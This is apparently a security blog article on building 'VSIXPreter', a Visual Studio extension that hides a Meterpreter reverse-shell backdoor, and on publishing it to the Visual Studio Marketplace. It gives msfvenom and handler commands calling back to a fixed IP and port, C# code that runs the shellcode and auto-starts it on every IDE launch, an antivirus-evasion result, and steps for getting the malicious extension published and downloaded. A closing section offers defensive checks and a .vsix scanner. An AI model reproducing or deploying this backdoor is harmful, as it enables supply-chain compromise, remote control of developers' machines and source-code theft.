
Meterpreter is undoubtedly one of the most useful payloads available to cybersecurity professionals. In almost every test, engagement and piece of research we conduct, we need a capable implant like Meterpreter; a security test without it is hard for most people in the field to imagine. The range of modules it offers for pivoting to other systems after a first foothold, its small footprint and its stability have made it one of the most powerful tools available. That power is multiplied when it is paired with a good delivery method on Windows. If the code we develop will not be delivered to the target by an exploit but will instead be used as a backdoor, the delivery method becomes just as important as the code itself.
MSFVenom can produce Meterpreter payloads in many formats and for many platforms. This article addresses two topics: building a Visual Studio add-in that runs a Meterpreter payload every time the IDE starts, and distributing that add-in through the Visual Studio Marketplace.
GitHub: VSIXPreter
I needed a piece of malware that would integrate with Visual Studio and start automatically every time the application was launched. Starting from this need, I decided to write an add-in for Visual Studio and embed malicious code within the add-in I wrote.
First, we will write a malicious add-in for Visual Studio from within Visual Studio itself.
To write an add-in for Visual Studio, let us click “Create new project…” from the Visual Studio 2017 main screen.

To develop an add-in that will run in Visual Studio 2017, after clicking “Create New Project”, we need to select Extensibility VSIX Project. If the menu below this is empty and you cannot see the screen above, the SDK is not installed on your computer. To install the SDK, it is sufficient to click “Open Visual Studio Installer” from the “Create New Project” window.

You can install the SDK by ticking the “Visual Studio extension development” option from the screen that appears.
I created a project named VSIXPreter. With this project we will have developed an add-in for Visual Studio. When the project is created, “index.html” and “stylesheet.css” files will be created automatically. Let us delete these two files after creating the project.

We then right-click on the project, click the Add → New Item menu, and encounter the screen above. By selecting Extensibility Custom Command and naming the file “PreterCommand.cs”, we add the “cs” file in which we will code the Meterpreter to the project.
Before moving on to coding, we need to generate the Meterpreter shellcode using the MSFVenom tool. The code we generate will be produced in a format compatible with C#.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.228.127 LPORT=4444 --platform windows -f csharp
With the above command, we generate a C#-compatible shellcode that will connect to port 4444 of IP address 192.168.228.127 using the reverse_tcp method.
msfconsole -q
use windows/meterpreter/reverse_tcp
set LHOST 192.168.228.127
set LPORT 4444
generate -p windows -t csharp
We can also generate the shellcode inside msfconsole, as shown above. Both methods produce C#-compatible output. One point to watch is that the two tools use the same switch letters for different things: in msfvenom “-p” selects the payload, whereas in the msfconsole “generate” command of that era “-p” selects the platform and “-t” the output format (in Metasploit 5 and later, “generate” takes the format with “-f csharp”, like msfvenom). Although both run on the same framework, the meaning of the switches differs.

We need three Win32 functions to run the shellcode, imported into C# with DllImport (P/Invoke) as shown above. VirtualAlloc allocates a region of memory the size of the shellcode; it has to be requested with PAGE_EXECUTE_READWRITE protection, otherwise the first instruction of the stager faults. CreateThread starts a new thread whose start address is that region, which is what actually executes the shellcode. WaitForSingleObject blocks the calling thread until the shellcode thread exits (or a timeout elapses), so the method does not return while the Meterpreter session is alive.

I defined a method named RunMeterpreter that takes the IP address and port as strings. The complete method that runs the Meterpreter shellcode is as follows:

I encoded the Meterpreter shellcode with Base64 and assigned it to a variable named shellCodeRaw. From the IP and port passed in, the method then builds the 12 Base64 characters (newShellCode) that encode the bytes holding the connect-back address in the stager and splices them into the main Base64 string at a fixed offset (every 4 Base64 characters encode 3 bytes, so 12 characters cover 9 bytes and the replacement has to start on a 3-byte boundary of the decoded shellcode). This way, instead of generating new shellcode every time the IP address changes, it is enough to change the string I pass in.
private void Execute(object sender, EventArgs e)
{
    // Run the payload on a thread-pool thread so the IDE's UI thread is never blocked.
    Task.Factory.StartNew(() => RunMeterpreter("192.168.228.127", "4444"));
}
We have written the method that runs the Meterpreter shellcode. To call it, we put the code above inside the Execute method (generated by the template as private void) in PreterCommand.cs. Task.Factory.StartNew runs RunMeterpreter on a thread-pool thread, so the WaitForSingleObject call inside it does not block Visual Studio's UI thread. The add-in is now ready; building the project produces it.
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.228.127
set LPORT 4444
set ExitOnSession false
exploit -j
To receive the incoming Meterpreter connection, we start multi/handler as shown above (ExitOnSession false and -j keep it listening in the background for repeated connections). We can now run the vsix (Visual Studio extension) file we created to install the add-in. An important point is that Visual Studio 2017 must be closed while the add-in is being installed; if it is not, the VSIX Installer will report an error.

When our project named VSIXPreter is compiled, “VSIXPreter.dll” and “VSIXPreter.vsix” files will be created. When we double-click and run the VSIXPreter.vsix file, the VSIX Installer will run as shown above and will ask whether we want to install the application. We can install the add-in in Visual Studio 2017 by clicking “Install” on this screen.

After the installation is complete, we will see the screen above. Our add-in installation was completed successfully. By opening Visual Studio 2017 and clicking “Run PreterCommand” from the “Tools” menu, we can obtain a Meterpreter connection.

As can be seen, Run PreterCommand has been added to the Tools menu. Every time this menu item is run, our Meterpreter reverse_tcp shellcode is triggered and a connection is sent to the specified address. At this point, however, we hit a problem: having to click the item in the Tools menu every time after installing the add-in in Visual Studio 2017 is impractical. We therefore need code that triggers the Meterpreter shellcode automatically every time Visual Studio opens. But first, let us upload the “VSIXPreter.vsix” file we created to VirusTotal and look at the results.

We submitted the malware we created to VirusTotal. And — Bingo! 0/60. The malware we created is not recognised by any anti-malware product. Let us continue examining the malware we created using Process Hacker.

The VSIXPreter.dll file we created was loaded by devenv.exe and sent the connection to port 4444 of IP address 192.168.228.127. We now need to modify our code so that it runs every time Visual Studio 2017 is opened.

Creating PreterCommand.cs also generates a “PreterCommandPackage.cs” file. By adding the attributes shown above to the package class in this file, we make the malware run every time Visual Studio 2017 starts.
ProvideAutoLoad needs a UI context under which the package should load automatically, and VSConstants.UICONTEXT.NoSolution_string is exactly that: the context that is active when the IDE is open with no solution loaded. With this attribute, the package is loaded every time Visual Studio 2017 opens and a Meterpreter connection is obtained.

Many other AutoLoad conditions are available. There are dozens of UI contexts to choose from, such as when any C# project is opened, when the code editor is activated, when debugging starts, when a drag operation is performed, or when a project is loaded in the background. With “NoSolution_string” we made the malware start automatically every time Visual Studio 2017 opens. One last step remains: every time Visual Studio 2017 opens, a Task must run the shellcode defined in our RunMeterpreter method.

We can use the PreterCommandPackage() constructor in PreterCommandPackage.cs for this. Inside it we start a Task that calls RunMeterpreter in PreterCommand. A thread is therefore created each time Visual Studio 2017 starts and we obtain a Meterpreter connection without the IDE freezing, because the Task keeps the WaitForSingleObject call off the UI thread.
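The auto-load wiring described in the last three paragraphs, as an added example rather than the article's own PreterCommandPackage.cs. It assumes the Package-based class that the VS 2017 VSIX template generated at the time, that PreterCommand.RunMeterpreter is reachable as a static method, and a placeholder package GUID in place of the one the template generates. Visual Studio 2019 and later block synchronous auto-load; there the class has to derive from AsyncPackage and the attribute needs PackageAutoLoadFlags.BackgroundLoad, otherwise the package simply never loads.

```csharp
using System;
using System.Runtime.InteropServices;
using System.Threading.Tasks;
using Microsoft.VisualStudio;
using Microsoft.VisualStudio.Shell;

// Added example, not the article's file. Mirrors the VS 2017 Package-based template.
namespace VSIXPreter
{
    [PackageRegistration(UseManagedResourcesOnly = true)]
    [InstalledProductRegistration("#110", "#112", "1.0", IconResourceID = 400)]
    [ProvideMenuResource("Menus.ctmenu", 1)]
    [Guid(PreterCommandPackage.PackageGuidString)]
    // Load as soon as the IDE is up with no solution open. The attribute compiles into an
    // AutoLoadPackages entry in the extension's .pkgdef, which is also what a reviewer can grep for.
    [ProvideAutoLoad(VSConstants.UICONTEXT.NoSolution_string)]
    public sealed class PreterCommandPackage : Package
    {
        // Placeholder: the VSIX template generates a real GUID here.
        public const string PackageGuidString = "00000000-0000-0000-0000-000000000000";

        public PreterCommandPackage()
        {
            // Runs when VS constructs the package, before Initialize(), i.e. on every IDE start
            // once the auto-load context is active. Start the payload off the UI thread so the
            // WaitForSingleObject inside RunMeterpreter cannot freeze devenv.exe.
            // PreterCommand.RunMeterpreter is assumed to be static (assumption, see lead-in).
            Task.Factory.StartNew(() => PreterCommand.RunMeterpreter("192.168.228.127", "4444"));
        }

        protected override void Initialize()
        {
            // Template-generated: wires the "Run PreterCommand" item into the Tools menu.
            PreterCommand.Initialize(this);
            base.Initialize();
        }
    }
}
```

Starting the payload from the constructor rather than from Initialize() means it runs even before the package is sited, so nothing in the IDE has a chance to observe or cancel it; for a defender, the .pkgdef AutoLoadPackages key is the most reliable static indicator that a package will run at startup.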
We have coded our malicious Visual Studio add-in. However, we also need to distribute it. For this purpose, I chose the Visual Studio Marketplace. We can submit the malicious add-in we created to the Marketplace and make it available for download. If we develop a well-presented and attention-grabbing add-in, we can increase the likelihood of it being downloaded. In this article, I developed and uploaded an application purely as an example, and I was curious whether the Marketplace would publish the code. My prediction was correct — my code was uploaded and published within approximately 5 minutes and became available for download. To publish the malicious add-in we created on the Marketplace, we need a “Visual Studio Marketplace Publishing Portal” account. We can use any Microsoft account (Hotmail, MSN, etc.) for this account.
Let us sign in to our Visual Studio Marketplace account at marketplace.visualstudio.com. We reach the upload screen by clicking “Publish extensions” on the home page; the site redirects us to the “Manage Publishers & Extensions” page. There, we first define a new Publisher by clicking “Create publisher”.

The form above asks for the publisher details. What we enter here matters: the publisher we define in the Marketplace must match the publisher recorded in the extension's manifest (the Publisher attribute of source.extension.vsixmanifest, which the VSIX Installer also shows). If they do not match, the extension cannot be published. After creating the Publisher, we can upload our application to the Marketplace.

As in the screenshot above, we click Visual Studio from the New Extension menu. The Marketplace will open a new page and ask us to upload the application we developed.

We select and upload our application, then fill in the form that appears to publish our application to the Marketplace.

After our application is uploaded, it appears in the Extension menu as shown above. To make it accessible to everyone, we right-click on the application and tick “Make Public”; it is then marked “Public” in the Availability section. Once uploaded to the Marketplace, the extension was approved within approximately 5 minutes. At least at the time of this test, no check was performed to determine whether it contained malicious code.
If any developer installs our malware from the Marketplace as a Visual Studio add-in, we will obtain a Meterpreter connection every time they open Visual Studio 2017.

We can install our application from the Marketplace by clicking “Extensions and Updates” from the Tools menu in Visual Studio 2017. By clicking the Online menu on the left and typing “vsixpreter” in the search field, we can see the application. By clicking Download, we can have the application downloaded and installed.

As can be seen in the screen above, our Meterpreter connection ran with process ID 31488 and the connection was sent to IP address 192.168.228.127.
Not every extension on the Marketplace is safe. Run your own checks on everything you download before installing it: look at who the publisher is, at what the extension auto-loads and which native APIs its assemblies import, and watch for devenv.exe making outbound connections it has no reason to make. Worse scenarios than a shell are possible, such as theft of the source code you write.
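One way to do those checks before installing, as an added example that is not part of the article: a .vsix is an OPC zip, so its manifest, its .pkgdef (where ProvideAutoLoad ends up as an AutoLoadPackages key) and its assemblies can all be read offline. The P/Invoke names are searched as plain ASCII in the assembly bytes, which is enough for a straightforward DllImport like the article's but not for obfuscated or dynamically resolved imports. The NoSolution context GUID in the table is the one VSConstants.UICONTEXT.NoSolution_string stands for.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Text.RegularExpressions;

// Added example, not part of the article: offline triage of a downloaded .vsix.
public static class VsixTriage
{
    // Win32 names a Visual Studio extension has no ordinary reason to P/Invoke.
    private static readonly string[] NativeExecApis =
        { "VirtualAlloc", "VirtualProtect", "CreateThread", "CreateRemoteThread", "WriteProcessMemory" };

    // UI context GUIDs worth naming in the report (NoSolution is the one the article uses).
    private static readonly Dictionary<string, string> KnownContexts =
        new Dictionary<string, string>(StringComparer.OrdinalIgnoreCase)
        {
            { "adfc4e64-0397-11d1-9f4e-00a0c911004f", "NoSolution (every IDE start)" },
        };

    public static List<string> Scan(string vsixPath)
    {
        var findings = new List<string>();
        using (ZipArchive zip = ZipFile.OpenRead(vsixPath))   // a .vsix is an OPC zip
        {
            foreach (ZipArchiveEntry entry in zip.Entries)
            {
                string name = entry.FullName;
                if (name.Equals("extension.vsixmanifest", StringComparison.OrdinalIgnoreCase))
                {
                    Match m = Regex.Match(ReadText(entry), "Publisher=\"([^\"]*)\"");
                    findings.Add("manifest publisher: " + (m.Success ? m.Groups[1].Value : "(missing)"));
                }
                else if (name.EndsWith(".pkgdef", StringComparison.OrdinalIgnoreCase))
                {
                    // ProvideAutoLoad is compiled into [$RootKey$\AutoLoadPackages\{ui-context-guid}].
                    foreach (Match m in Regex.Matches(ReadText(entry), @"AutoLoadPackages\\\{([0-9A-Fa-f-]+)\}"))
                    {
                        string guid = m.Groups[1].Value, label;
                        findings.Add(name + ": auto-loads in UI context {" + guid + "}"
                                     + (KnownContexts.TryGetValue(guid, out label) ? " = " + label : ""));
                    }
                }
                else if (name.EndsWith(".dll", StringComparison.OrdinalIgnoreCase))
                {
                    byte[] data = ReadBytes(entry);
                    foreach (string api in NativeExecApis)
                        if (ContainsAscii(data, api))
                            findings.Add(name + ": references " + api);
                }
            }
        }
        return findings;
    }

    private static string ReadText(ZipArchiveEntry entry)
    {
        // Manifest and pkgdef files may be UTF-8 or UTF-16; let the BOM decide.
        using (var reader = new StreamReader(entry.Open(), Encoding.UTF8, true))
            return reader.ReadToEnd();
    }

    private static byte[] ReadBytes(ZipArchiveEntry entry)
    {
        using (Stream s = entry.Open())
        using (var ms = new MemoryStream())
        {
            s.CopyTo(ms);
            return ms.ToArray();
        }
    }

    // DllImport targets sit as plain ASCII in the assembly's #Strings heap, so a byte search
    // is enough here; obfuscated or dynamically resolved imports would need a metadata parser.
    private static bool ContainsAscii(byte[] data, string needle)
    {
        byte[] n = Encoding.ASCII.GetBytes(needle);
        for (int i = 0; i + n.Length <= data.Length; i++)
        {
            int j = 0;
            while (j < n.Length && data[i + j] == n[j]) j++;
            if (j == n.Length) return true;
        }
        return false;
    }

    public static void Main(string[] args)
    {
        foreach (string line in Scan(args[0]))
            Console.WriteLine(line);
    }
}
```

Run against VSIXPreter.vsix this would report the publisher, an AutoLoadPackages entry for the NoSolution context and VSIXPreter.dll referencing VirtualAlloc and CreateThread; any one of those is worth a closer look, and the combination is a strong reason not to install.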